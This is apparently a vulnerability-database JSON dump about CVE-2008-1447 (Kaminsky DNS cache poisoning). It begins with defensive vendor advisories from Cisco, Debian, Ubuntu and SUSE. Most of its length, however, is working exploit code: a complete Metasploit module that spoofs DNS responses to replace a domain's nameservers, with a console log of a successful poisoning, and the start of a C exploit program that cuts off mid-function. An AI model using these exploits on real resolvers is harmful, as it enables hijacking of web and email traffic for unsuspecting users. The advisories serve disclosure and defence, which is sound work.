worldwide\r\nwebsite at http://www.cisco.com.\r\n\r\nCustomers using Third Party Support Organizations\r\n+------------------------------------------------\r\n\r\nCustomers whose Cisco products are provided or maintained through prior\r\nor existing agreements with third-party support organizations, such\r\nas Cisco Partners, authorized resellers, or service providers should\r\ncontact that support organization for guidance and assistance with the\r\nappropriate course of action in regards to this advisory.\r\n\r\nThe effectiveness of any workaround or fix is dependent on specific\r\ncustomer situations, such as product mix, network topology, traffic\r\nbehavior, and organizational mission. Due to the variety of affected\r\nproducts and releases, customers should consult with their service\r\nprovider or support organization to ensure any applied workaround or fix\r\nis the most appropriate for use in the intended network before it is\r\ndeployed.\r\n\r\nCustomers without Service Contracts\r\n+----------------------------------\r\n\r\nCustomers who purchase direct from Cisco but do not hold a Cisco service\r\ncontract, and customers who purchase through third-party vendors but are\r\nunsuccessful in obtaining fixed software through their point of sale\r\nshould acquire upgrades by contacting the Cisco Technical Assistance\r\nCenter (TAC). TAC contacts are as follows.\r\n\r\n * +1 800 553 2447 (toll free from within North America)\r\n * +1 408 526 7209 (toll call from anywhere in the world)\r\n * e-mail: tac@cisco.com\r\n\r\nCustomers should have their product serial number available and be\r\nprepared to give the URL of this notice as evidence of entitlement to a\r\nfree upgrade. Free upgrades for non-contract customers must be requested\r\nthrough the TAC.\r\n\r\nRefer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml\r\nfor additional TAC contact information, including localized telephone\r\nnumbers, and instructions and e-mail addresses for use in various\r\nlanguages.\r\n\r\nExploitation and Public Announcements\r\n=====================================\r\n\r\nThe Cisco PSIRT is not aware of any public announcements or malicious\r\nuse of the vulnerability described in this advisory.\r\n\r\nAlthough DNS cache poisoning attacks are not new, security researcher\r\nDan Kaminsky of IOActive recently presented a technique that makes DNS\r\ncache poisoning attacks more likely to succeed. Cisco would like to\r\nthank Dan Kaminsky for notifying vendors about his findings.\r\n\r\nNote that vulnerability information for Cisco IOS Software is being\r\nprovided in this advisory outside of the announced publication schedule\r\nfor Cisco IOS Software described at http://www.cisco.com/go/psirt due to\r\nindustry-wide disclosure of the vulnerability.\r\n\r\nStatus of this Notice: FINAL\r\n============================\r\n\r\nTHIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY\r\nANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF\r\nMERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE\r\nINFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS\r\nAT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS\r\nDOCUMENT AT ANY TIME.\r\n\r\nA stand-alone copy or Paraphrase of the text of this document that omits\r\nthe distribution URL in the following section is an uncontrolled copy,\r\nand may lack important information or contain factual errors.\r\n\r\nDistribution\r\n============\r\n\r\nThis advisory is posted on Cisco's worldwide website at\r\n\r\nhttp://www.cisco.com/warp/public/707/cisco-sa-20080708-dns.shtml\r\n\r\nIn addition to worldwide web posting, a text version of this notice is\r\nclear-signed with the Cisco PSIRT PGP key and is posted to the following\r\ne-mail and Usenet news recipients.\r\n\r\n * cust-security-announce@cisco.com\r\n * first-teams@first.org\r\n * bugtraq@securityfocus.com\r\n * vulnwatch@vulnwatch.org\r\n * cisco@spot.colorado.edu\r\n * cisco-nsp@puck.nether.net\r\n * full-disclosure@lists.grok.org.uk\r\n * comp.dcom.sys.cisco@newsgate.cisco.com\r\n\r\nFuture updates of this advisory, if any, will be placed on Cisco's\r\nworldwide website, but may or may not be actively announced on mailing\r\nlists or newsgroups. Users concerned about this problem are encouraged\r\nto check the above URL for any updates.\r\n\r\nRevision History\r\n================\r\n\r\n+-----------------------------------------------------------+\r\n| Revision 1.0 | 2008-July-08 | Initial public release |\r\n+-----------------------------------------------------------+\r\n\r\nCisco Security Procedures\r\n=========================\r\n\r\nComplete information on reporting security vulnerabilities in\r\nCisco products, obtaining assistance with security incidents, and\r\nregistering to receive security information from Cisco, is available\r\non Cisco's worldwide website at\r\nhttp://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.\r\nThis includes instructions for press inquiries regarding Cisco security\r\nnotices. All Cisco security advisories are available at\r\nhttp://www.cisco.com/go/psirt.\r\n\r\n+--------------------------------------------------------------------\r\nCopyright 2007-2008 Cisco Systems, Inc. All rights reserved.\r\n+--------------------------------------------------------------------\r\n\r\nUpdated: Jul 08, 2008 Document ID: 107064\r\n\r\n+--------------------------------------------------------------------\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (GNU/Linux)\r\n\r\niEYEARECAAYFAkhztUIACgkQ86n/Gc8U/uCAgACfVRRoJO4w4defnpwbNlfgBm4t\r\n2SMAnjKCKECHtsjN9umqqPrPd2DW4IcC\r\n=XGZw\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2008-07-12T00:00:00", "published": "2008-07-12T00:00:00", "id": "SECURITYVULNS:DOC:20146", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20146", "title": "Cisco Security Advisory: Multiple Cisco Products Vulnerable to DNS Cache Poisoning Attacks", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:26", "bulletinFamily": "software", "cvelist": ["CVE-2008-1447"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- ------------------------------------------------------------------------\r\nDebian Security Advisory DSA-1605-1 security@debian.org\r\nhttp://www.debian.org/security/ Florian Weimer\r\nJuly 08, 2008 http://www.debian.org/security/faq\r\n- ------------------------------------------------------------------------\r\n\r\nPackage : glibc\r\nVulnerability : DNS cache poisoning\r\nProblem type : remote\r\nDebian-specific: no\r\nCVE Id(s) : CVE-2008-1447\r\nCERT advisory : VU#800113\r\n\r\n\r\nDan Kaminsky discovered that properties inherent to the DNS protocol\r\nlead to practical DNS spoofing and cache poisoning attacks. Among\r\nother things, successful attacks can lead to misdirected web traffic\r\nand email rerouting.\r\n\r\nAt this time, it is not possible to implement the recommended\r\ncountermeasures in the GNU libc stub resolver. The following\r\nworkarounds are available:\r\n\r\n1. Install a local BIND 9 resoler on the host, possibly in\r\nforward-only mode. BIND 9 will then use source port randomization\r\nwhen sending queries over the network. (Other caching resolvers can\r\nbe used instead.)\r\n\r\n2. Rely on IP address spoofing protection if available. Successful\r\nattacks must spoof the address of one of the resolvers, which may not\r\nbe possible if the network is guarded properly against IP spoofing\r\nattacks (both from internal and external sources).\r\n\r\nThis DSA will be updated when patches for hardening the stub resolver\r\nare available.\r\n\r\n- ---------------------------------------------------------------------------------\r\nFor apt-get: deb http://security.debian.org/ stable/updates main\r\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\r\nMailing list: debian-security-announce@lists.debian.org\r\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.6 (GNU/Linux)\r\n\r\niQEVAwUBSHOIFr97/wQC1SS+AQIscwf+KBKMT4hcpB5TCNE+0v1DNBHiQ4rh7ktz\r\nKiOyLWEJOaxOrpsR8siA6B6newiLe5KfwojDikqSCXbubTCeicj79HTCx5DzzhTm\r\naa3HePARxmtN1AuyFCebOfklibTtyY/gpwydCdAVBiV0+LmD+jXy9Jx4AfyuibXZ\r\nVaqkUTj5sUUQn5CacdI1zc1Ky1rzbzRBBoNJ1D1rRBU1wjoGsvVjBV9p24j/1E2c\r\nmYtbY3g1FKmhnOTLBac/AAW62ZQ44yf4QcGgwV8CULfi5c2QmGiRYZioWDVd0pfZ\r\nhr2h/Vmjs2qgf8B9FmYet0hEGm6SrEryT2ievlqXkpul0MYtHjJ5iw==\r\n=CMHb\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2008-07-12T00:00:00", "published": "2008-07-12T00:00:00", "id": "SECURITYVULNS:DOC:20145", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20145", "title": "[SECURITY] [DSA 1605-1] DNS vulnerability impact on the libc stub resolver", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "ubuntu": [{"lastseen": "2020-07-08T23:41:00", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "Dan Kaminsky discovered weaknesses in the DNS protocol as implemented \nby Dnsmasq. A remote attacker could exploit this to spoof DNS entries \nand poison DNS caches. Among other things, this could lead to \nmisdirected email and web traffic.", "edition": 5, "modified": "2008-07-22T00:00:00", "published": "2008-07-22T00:00:00", "id": "USN-627-1", "href": "https://ubuntu.com/security/notices/USN-627-1", "title": "Dnsmasq vulnerability", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-07-09T00:23:24", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "Dan Kaminsky discovered weaknesses in the DNS protocol as implemented \nby Bind. A remote attacker could exploit this to spoof DNS entries and \npoison DNS caches. Among other things, this could lead to misdirected \nemail and web traffic.", "edition": 5, "modified": "2008-07-08T00:00:00", "published": "2008-07-08T00:00:00", "id": "USN-622-1", "href": "https://ubuntu.com/security/notices/USN-622-1", "title": "Bind vulnerability", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "suse": [{"lastseen": "2016-09-04T11:48:25", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "The bind daemon is responsible for resolving hostnames in IP addresses and vice versa. The new version of bind uses a random transaction-ID (TRXID) and a random UDP source-port for DNS queries to address DNS cache poisoning attacks possible because of the \"birthday paradox\" and an attack discovered by Dan Kaminsky. Unfortunately we do not have details about Kaminsky's attack and have to trust the statement that a random UDP source-port is sufficient to stop it. DNS servers that do not support recursive queries or do not use a cache (authoritative only servers) are not vulnerable too. Update packages of bind9 for SLES8 will be available soon. The glibc stub resolver is known to be vulnerable too and we will publish updates as soon as possible. Note, a local attacker can always sniff DNS queries and generate spoofed responses easily. If you use the UDP source-port number of the DNS server in your firewall configuration, for example to let DNS queries through your packetfilter, then you have to take steps to adapt your filter rules to the new behavior of the DNS server.\n#### Solution\nTo protect your infrastructure from cache poisoning attacks you should provide two DNS servers. One that is authoritative only and accessible from the Internet to resolve queries for your local systems that are available over the Internet. The other system (caching) is not accessible over the Internet and can be used by internal clients to recursively lookup names and addresses. But we encourage you to install the bind update as soon as possible too. If you use the latest update of pdns-recursor you are not vulnerable to this attack. For the glibc stub resolver bug you can install a local secure DNS for- warder on your machine or make a DNS forwarder available for a protected network.", "edition": 1, "modified": "2008-07-11T09:57:52", "published": "2008-07-11T09:57:52", "id": "SUSE-SA:2008:033", "href": "http://lists.opensuse.org/opensuse-security-announce/2008-07/msg00003.html", "title": "DNS cache poisoning in bind", "type": "suse", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "Dnsmasq is lightweight, easy to configure DNS forwarder and DHCP server. It is designed to provide DNS and, optionally, DHCP, to a small network. It can serve the names of local machines which are not in the global DNS. The DHCP server integrates with the DNS server and allows machines with DHCP-allocated addresses to appear in the DNS with names configured either in each host or in a central configuration file. Dnsmasq supports static and dynamic DHCP leases and BOOTP for network booting of diskless machines. ", "modified": "2009-02-14T22:11:22", "published": "2009-02-14T22:11:22", "id": "FEDORA:EB89E20852E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 9 Update: dnsmasq-2.45-1.fc9", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "packetstorm": [{"lastseen": "2016-12-05T22:21:07", "description": "", "published": "2008-07-24T00:00:00", "type": "packetstorm", "title": "bailiwicked_domain.rb.txt", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1447"], "modified": "2008-07-24T00:00:00", "id": "PACKETSTORM:68473", "href": "https://packetstormsecurity.com/files/68473/bailiwicked_domain.rb.txt.html", "sourceData": "` ____ ____ __ __ \n/ \\ / \\ | | | | \n----====####/ /\\__\\##/ /\\ \\##| |##| |####====---- \n| | | |__| | | | | | \n| | ___ | __ | | | | | \n------======######\\ \\/ /#| |##| |#| |##| |######======------ \n\\____/ |__| |__| \\______/ \n \nComputer Academic Underground \nhttp://www.caughq.org \nExploit Code \n \n===============/======================================================== \nExploit ID: CAU-EX-2008-0003 \nRelease Date: 2008.07.23 \nTitle: bailiwicked_domain.rb \nDescription: Kaminsky DNS Cache Poisoning Flaw Exploit for Domains \nTested: BIND 9.4.1-9.4.2 \nAttributes: Remote, Poison, Resolver, Metasploit \nExploit URL: http://www.caughq.org/exploits/CAU-EX-2008-0003.txt \nAuthor/Email: I)ruid <druid (@) caughq.org> \nH D Moore <hdm (@) metasploit.com> \n===============/======================================================== \n \nDescription \n=========== \n \nThis exploit targets a fairly ubiquitous flaw in DNS implementations \nwhich allow the insertion of malicious DNS records into the cache of the \ntarget nameserver. This exploit caches a single malicious nameserver \nentry into the target nameserver which replaces the legitimate \nnameservers for the target domain. By causing the target nameserver to \nquery for random hostnames at the target domain, the attacker can spoof \na response to the target server including an answer for the query, an \nauthority server record, and an additional record for that server, \ncausing target nameserver to insert the additional record into the \ncache. This insertion completely replaces the original nameserver \nrecords for the target domain. \n \n \nExample \n======= \n \n# /msf3/msfconsole \n \n## ### ## ## \n## ## #### ###### #### ##### ##### ## #### ###### \n####### ## ## ## ## ## ## ## ## ## ## ### ## \n####### ###### ## ##### #### ## ## ## ## ## ## ## \n## # ## ## ## ## ## ## ##### ## ## ## ## ## \n## ## #### ### ##### ##### ## #### #### #### ### \n## \n \n \n=[ msf v3.2-release \n+ -- --=[ 298 exploits - 124 payloads \n+ -- --=[ 18 encoders - 6 nops \n=[ 73 aux \n \nmsf > use auxiliary/spoof/dns/bailiwicked_domain \nmsf auxiliary(bailiwicked_domain) > set RHOST A.B.C.D \nRHOST => A.B.C.D \nmsf auxiliary(bailiwicked_domain) > set DOMAIN example.com \nDOMAIN => example.com \nmsf auxiliary(bailiwicked_domain) > set NEWDNS dns01.metasploit.com \nNEWDNS => dns01.metasploit.com \nmsf auxiliary(bailiwicked_domain) > set SRCPORT 0 \nSRCPORT => 0 \nmsf auxiliary(bailiwicked_domain) > check \n[*] Using the Metasploit service to verify exploitability... \n[*] >> ADDRESS: A.B.C.D PORT: 50391 \n[*] >> ADDRESS: A.B.C.D PORT: 50391 \n[*] >> ADDRESS: A.B.C.D PORT: 50391 \n[*] >> ADDRESS: A.B.C.D PORT: 50391 \n[*] >> ADDRESS: A.B.C.D PORT: 50391 \n[*] FAIL: This server uses static source ports and is vulnerable to poisoning \nmsf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D \n[*] exec: dig +short -t ns example.com @A.B.C.D \n \nb.iana-servers.net. \na.iana-servers.net. \n \nmsf auxiliary(bailiwicked_domain) > run \n[*] Switching to target port 50391 based on Metasploit service \n[*] Targeting nameserver A.B.C.D for injection of example.com. nameservers as dns01.metasploit.com \n[*] Querying recon nameserver for example.com.'s nameservers... \n[*] Got an NS record: example.com. 171957 IN NS b.iana-servers.net. \n[*] Querying recon nameserver for address of b.iana-servers.net.... \n[*] Got an A record: b.iana-servers.net. 171028 IN A 193.0.0.236 \n[*] Checking Authoritativeness: Querying 193.0.0.236 for example.com.... \n[*] b.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as \n[*] Got an NS record: example.com. 171957 IN NS a.iana-servers.net. \n[*] Querying recon nameserver for address of a.iana-servers.net.... \n[*] Got an A record: a.iana-servers.net. 171414 IN A 192.0.34.43 \n[*] Checking Authoritativeness: Querying 192.0.34.43 for example.com.... \n[*] a.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as \n[*] Attempting to inject poison records for example.com.'s nameservers into A.B.C.D:50391... \n[*] Sent 1000 queries and 20000 spoofed responses... \n[*] Sent 2000 queries and 40000 spoofed responses... \n[*] Sent 3000 queries and 60000 spoofed responses... \n[*] Sent 4000 queries and 80000 spoofed responses... \n[*] Sent 5000 queries and 100000 spoofed responses... \n[*] Sent 6000 queries and 120000 spoofed responses... \n[*] Sent 7000 queries and 140000 spoofed responses... \n[*] Sent 8000 queries and 160000 spoofed responses... \n[*] Sent 9000 queries and 180000 spoofed responses... \n[*] Sent 10000 queries and 200000 spoofed responses... \n[*] Sent 11000 queries and 220000 spoofed responses... \n[*] Sent 12000 queries and 240000 spoofed responses... \n[*] Sent 13000 queries and 260000 spoofed responses... \n[*] Poisoning successful after 13250 attempts: example.com. == dns01.metasploit.com \n[*] Auxiliary module execution completed \n \nmsf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D \n[*] exec: dig +short -t ns example.com @A.B.C.D \n \ndns01.metasploit.com. \n \n \nCredits \n======= \n \nDan Kaminsky is credited with originally discovering this vulnerability. \n \n \nReferences \n========== \n \nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447 \nhttp://www.kb.cert.org/vuls/id/800113 \n \n \nMetasploit \n========== \n \nrequire 'msf/core' \nrequire 'net/dns' \nrequire 'scruby' \nrequire 'resolv' \n \nmodule Msf \n \nclass Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary \n \ninclude Exploit::Remote::Ip \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'DNS BailiWicked Domain Attack', \n'Description' => %q{ \nThis exploit attacks a fairly ubiquitous flaw in DNS implementations which \nDan Kaminsky found and disclosed ~Jul 2008. This exploit replaces the target \ndomains nameserver entries in a vulnerable DNS cache server. This attack works \nby sending random hostname queries to the target DNS server coupled with spoofed \nreplies to those queries from the authoritative nameservers for that domain. \nEventually, a guessed ID will match, the spoofed packet will get accepted, and \nthe nameserver entries for the target domain will be replaced by the server \nspecified in the NEWDNS option of this exploit. \n}, \n'Author' => [ 'I)ruid', 'hdm' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 5590 $', \n'References' => \n[ \n[ 'CVE', '2008-1447' ], \n[ 'US-CERT-VU', '8000113' ], \n[ 'URL', 'http://www.caughq.org/exploits/CAU-EX-2008-0003.txt' ], \n], \n'DisclosureDate' => 'Jul 21 2008' \n)) \n \nregister_options( \n[ \nOptPort.new('SRCPORT', [true, \"The target server's source query port (0 for automatic)\", nil]), \nOptString.new('DOMAIN', [true, 'The domain to hijack', 'example.com']), \nOptString.new('NEWDNS', [true, 'The hostname of the replacement DNS server', nil]), \nOptAddress.new('RECONS', [true, 'Nameserver used for reconnaissance', '208.67.222.222']), \nOptInt.new('XIDS', [true, 'Number of XIDs to try for each query', 10]), \nOptInt.new('TTL', [true, 'TTL for the malicious NS entry', 31337]), \n], self.class) \n \nend \n \ndef auxiliary_commands \nreturn { \"check\" => \"Determine if the specified DNS server (RHOST) is vulnerable\" } \nend \n \ndef cmd_check(*args) \ntarg = args[0] || rhost() \nif(not (targ and targ.length > 0)) \nprint_status(\"usage: check [dns-server]\") \nreturn \nend \n \nprint_status(\"Using the Metasploit service to verify exploitability...\") \nsrv_sock = Rex::Socket.create_udp( \n'PeerHost' => targ, \n'PeerPort' => 53 \n) \n \nrandom = false \nports = [] \nlport = nil \n \n1.upto(5) do |i| \n \nreq = Resolv::DNS::Message.new \ntxt = \"spoofprobe-check-#{i}-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com\" \nreq.add_question(txt, Resolv::DNS::Resource::IN::TXT) \nreq.rd = 1 \n \nsrv_sock.put(req.encode) \nres, addr = srv_sock.recvfrom() \n \n \nif res and res.length > 0 \nres = Resolv::DNS::Message.decode(res) \nres.each_answer do |name, ttl, data| \nif (name.to_s == txt and data.strings.join('') =~ /^([^\\s]+)\\s+.*red\\.metasploit\\.com/m) \nt_addr, t_port = $1.split(':') \n \nprint_status(\" >> ADDRESS: #{t_addr} PORT: #{t_port}\") \nt_port = t_port.to_i \nif(lport and lport != t_port) \nrandom = true \nend \nlport = t_port \nports << t_port \nend \nend \nend \nend \n \nsrv_sock.close \n \nif(ports.length < 5) \nprint_status(\"UNKNOWN: This server did not reply to our vulnerability check requests\") \nreturn \nend \n \nif(random) \nprint_status(\"PASS: This server does not use a static source port. Ports: #{ports.join(\", \")}\") \nprint_status(\" This server may still be exploitable, but not by this tool.\") \nelse \nprint_status(\"FAIL: This server uses static source ports and is vulnerable to poisoning\") \nend \nend \n \ndef run \ntarget = rhost() \nsource = Rex::Socket.source_address(target) \nsport = datastore['SRCPORT'] \ndomain = datastore['DOMAIN'] + '.' \nnewdns = datastore['NEWDNS'] \nrecons = datastore['RECONS'] \nxids = datastore['XIDS'].to_i \nnewttl = datastore['TTL'].to_i \nxidbase = rand(20001) + 20000 \n \naddress = Rex::Text.rand_text(4).unpack(\"C4\").join(\".\") \n \nsrv_sock = Rex::Socket.create_udp( \n'PeerHost' => target, \n'PeerPort' => 53 \n) \n \n# Get the source port via the metasploit service if it's not set \nif sport.to_i == 0 \nreq = Resolv::DNS::Message.new \ntxt = \"spoofprobe-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com\" \nreq.add_question(txt, Resolv::DNS::Resource::IN::TXT) \nreq.rd = 1 \n \nsrv_sock.put(req.encode) \nres, addr = srv_sock.recvfrom() \n \nif res and res.length > 0 \nres = Resolv::DNS::Message.decode(res) \nres.each_answer do |name, ttl, data| \nif (name.to_s == txt and data.strings.join('') =~ /^([^\\s]+)\\s+.*red\\.metasploit\\.com/m) \nt_addr, t_port = $1.split(':') \nsport = t_port.to_i \n \nprint_status(\"Switching to target port #{sport} based on Metasploit service\") \nif target != t_addr \nprint_status(\"Warning: target address #{target} is not the same as the nameserver's query source address #{t_addr}!\") \nend \nend \nend \nend \nend \n \n# Verify its not already poisoned \nbegin \nquery = Resolv::DNS::Message.new \nquery.add_question(domain, Resolv::DNS::Resource::IN::NS) \nquery.rd = 0 \n \nbegin \ncached = false \nsrv_sock.put(query.encode) \nanswer, addr = srv_sock.recvfrom() \n \nif answer and answer.length > 0 \nanswer = Resolv::DNS::Message.decode(answer) \nanswer.each_answer do |name, ttl, data| \n \nif((name.to_s + \".\") == domain and data.name.to_s == newdns) \nt = Time.now + ttl \nprint_status(\"Failure: This domain is already using #{newdns} as a nameserver\") \nprint_status(\" Cache entry expires on #{t.to_s}\") \nsrv_sock.close \ndisconnect_ip \nreturn \nend \nend \n \nend \nend until not cached \nrescue ::Interrupt \nraise $! \nrescue ::Exception => e \nprint_status(\"Error checking the DNS name: #{e.class} #{e} #{e.backtrace}\") \nend \n \n \nres0 = Net::DNS::Resolver.new(:nameservers => [recons], :dns_search => false, :recursive => true) # reconnaissance resolver \n \nprint_status \"Targeting nameserver #{target} for injection of #{domain} nameservers as #{newdns}\" \n \n# Look up the nameservers for the domain \nprint_status \"Querying recon nameserver for #{domain}'s nameservers...\" \nanswer0 = res0.send(domain, Net::DNS::NS) \n#print_status \" Got answer with #{answer0.header.anCount} answers, #{answer0.header.nsCount} authorities\" \n \nbarbs = [] # storage for nameservers \nanswer0.answer.each do |rr0| \nprint_status \" Got an #{rr0.type} record: #{rr0.inspect}\" \nif rr0.type == 'NS' \nprint_status \" Querying recon nameserver for address of #{rr0.nsdname}...\" \nanswer1 = res0.send(rr0.nsdname) # get the ns's answer for the hostname \n#print_status \" Got answer with #{answer1.header.anCount} answers, #{answer1.header.nsCount} authorities\" \nanswer1.answer.each do |rr1| \nprint_status \" Got an #{rr1.type} record: #{rr1.inspect}\" \nres2 = Net::DNS::Resolver.new(:nameservers => rr1.address, :dns_search => false, :recursive => false, :retry => 1) \nprint_status \" Checking Authoritativeness: Querying #{rr1.address} for #{domain}...\" \nanswer2 = res2.send(domain) \nif answer2 and answer2.header.auth? and answer2.header.anCount >= 1 \nnsrec = {:name => rr0.nsdname, :addr => rr1.address} \nbarbs << nsrec \nprint_status \" #{rr0.nsdname} is authoritative for #{domain}, adding to list of nameservers to spoof as\" \nend \nend \nend \nend \n \nif barbs.length == 0 \nprint_status( \"No DNS servers found.\") \nsrv_sock.close \ndisconnect_ip \nreturn \nend \n \n# Flood the target with queries and spoofed responses, one will eventually hit \nqueries = 0 \nresponses = 0 \n \nconnect_ip if not ip_sock \n \nprint_status( \"Attempting to inject poison records for #{domain}'s nameservers into #{target}:#{sport}...\") \n \nwhile true \nrandhost = Rex::Text.rand_text_alphanumeric(12) + '.' + domain # randomize the hostname \n \n# Send spoofed query \nreq = Resolv::DNS::Message.new \nreq.id = rand(2**16) \nreq.add_question(randhost, Resolv::DNS::Resource::IN::A) \n \nreq.rd = 1 \n \nbuff = ( \nScruby::IP.new( \n#:src => barbs[0][:addr].to_s, \n:src => source, \n:dst => target, \n:proto => 17 \n)/Scruby::UDP.new( \n:sport => (rand((2**16)-1024)+1024).to_i, \n:dport => 53 \n)/req.encode \n).to_net \nip_sock.sendto(buff, target) \nqueries += 1 \n \n# Send evil spoofed answer from ALL nameservers (barbs[*][:addr]) \nreq.add_answer(randhost, newttl, Resolv::DNS::Resource::IN::A.new(address)) \nreq.add_authority(domain, newttl, Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(newdns))) \nreq.add_additional(newdns, newttl, Resolv::DNS::Resource::IN::A.new(address)) # Ignored \nreq.qr = 1 \nreq.aa = 1 \n \nxidbase.upto(xidbase+xids-1) do |id| \nreq.id = id \nbarbs.each do |barb| \nbuff = ( \nScruby::IP.new( \n#:src => barbs[i][:addr].to_s, \n:src => barb[:addr].to_s, \n:dst => target, \n:proto => 17 \n)/Scruby::UDP.new( \n:sport => 53, \n:dport => sport.to_i \n)/req.encode \n).to_net \nip_sock.sendto(buff, target) \nresponses += 1 \nend \nend \n \n# status update \nif queries % 1000 == 0 \nprint_status(\"Sent #{queries} queries and #{responses} spoofed responses...\") \nend \n \n# every so often, check and see if the target is poisoned... \nif queries % 250 == 0 \nbegin \nquery = Resolv::DNS::Message.new \nquery.add_question(domain, Resolv::DNS::Resource::IN::NS) \nquery.rd = 0 \n \nsrv_sock.put(query.encode) \nanswer, addr = srv_sock.recvfrom() \n \nif answer and answer.length > 0 \nanswer = Resolv::DNS::Message.decode(answer) \nanswer.each_answer do |name, ttl, data| \nif((name.to_s + \".\") == domain and data.name.to_s == newdns) \nprint_status(\"Poisoning successful after #{queries} attempts: #{domain} == #{newdns}\") \nsrv_sock.close \ndisconnect_ip \nreturn \nend \nend \nend \nrescue ::Interrupt \nraise $! \nrescue ::Exception => e \nprint_status(\"Error querying the DNS name: #{e.class} #{e} #{e.backtrace}\") \nend \nend \n \nend \n \nend \n \nend \nend \n \n \n-- \nI)ruid, C\u00b2ISSP \ndruid@caughq.org \nhttp://druid.caughq.org \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/68473/bailiwicked_domain.rb.txt"}, {"lastseen": "2016-12-05T22:15:52", "description": "", "published": "2008-07-25T00:00:00", "type": "packetstorm", "title": "bind9x-poison.txt", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1447"], "modified": "2008-07-25T00:00:00", "id": "PACKETSTORM:68500", "href": "https://packetstormsecurity.com/files/68500/bind9x-poison.txt.html", "sourceData": "`/* \n* Exploit for CVE-2008-1447 - Kaminsky DNS Cache Poisoning Attack \n* \n* Compilation: \n* $ gcc -o kaminsky-attack kaminsky-attack.c `dnet-config --libs` -lm \n* \n* Dependency: libdnet (aka libdumbnet-dev under Ubuntu) \n* \n* Author: marc.bevand at rapid7 dot com \n*/ \n \n#define _BSD_SOURCE \n \n#include <sys/types.h> \n#include <err.h> \n#include <stdio.h> \n#include <stdlib.h> \n#include <string.h> \n#include <math.h> \n#include <time.h> \n#include <unistd.h> \n#include <dumbnet.h> \n \n#define DNSF_RESPONSE (1<<15) \n#define DNSF_AUTHORITATIVE (1<<10) \n#define DNSF_REC_DESIRED (1<<8) \n#define DNSF_REC_AVAILABLE (1<<7) \n \n#define TYPE_A 0x1 \n#define TYPE_NS 0x2 \n#define CLASS_IN 0x1 \n \nstruct dns_pkt \n{ \nuint16_t txid; \nuint16_t flags; \nuint16_t nr_quest; \nuint16_t nr_ans; \nuint16_t nr_auth; \nuint16_t nr_add; \n} __attribute__ ((__packed__)); \n \nvoid format_domain(u_char *buf, unsigned size, unsigned *len, const char *name) \n{ \nunsigned bufi, i, j; \nbufi = i = j = 0; \nwhile (name[i]) \n{ \nif (name[i] == '.') \n{ \nif (bufi + 1 + (i - j) > size) \nfprintf(stderr, \"format_domain overflow\\n\"), exit(1); \nbuf[bufi++] = i - j; \nmemcpy(buf + bufi, name + j, i - j); \nbufi += i - j; \nj = i + 1; \n} \ni++; \n} \nif (bufi + 1 + 2 + 2 > size) \nfprintf(stderr, \"format_domain overflow\\n\"), exit(1); \nbuf[bufi++] = 0; \n*len = bufi; \n} \n \nvoid format_qr(u_char *buf, unsigned size, unsigned *len, const char *name, uint16_t type, uint16_t class) \n{ \nuint16_t tmp; \n// name \nformat_domain(buf, size, len, name); \n// type \ntmp = htons(type); \nmemcpy(buf + *len, &tmp, sizeof (tmp)); \n*len += sizeof (tmp); \n// class \ntmp = htons(class); \nmemcpy(buf + *len, &tmp, sizeof (tmp)); \n*len += sizeof (tmp); \n} \n \nvoid format_rr(u_char *buf, unsigned size, unsigned *len, const char *name, uint16_t type, uint16_t class, uint32_t ttl, const char *data) \n{ 